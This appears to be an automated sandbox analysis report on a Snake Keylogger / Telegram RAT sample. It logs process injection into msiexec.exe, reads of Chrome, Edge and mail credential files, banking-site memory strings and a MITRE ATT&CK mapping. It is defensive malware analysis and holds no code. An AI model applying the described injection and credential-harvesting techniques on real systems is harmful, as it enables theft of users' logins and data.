Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024E1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\ugpJX5h56S.exe	API call chain: ExitProcess graph end node			graph_0-3912
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	API call chain: ExitProcess graph end node			graph_0-3915

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 6_2_00C3F71F LdrInitializeThunk,

6_2_00C3F71F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4240000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

0_2_0040351C

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6220, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 6220, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6220, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ugpJX5h56S.exe	42%	ReversingLabs	Win32.Trojan.SnakeLogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe	42%	ReversingLabs	Win32.Trojan.SnakeLogger

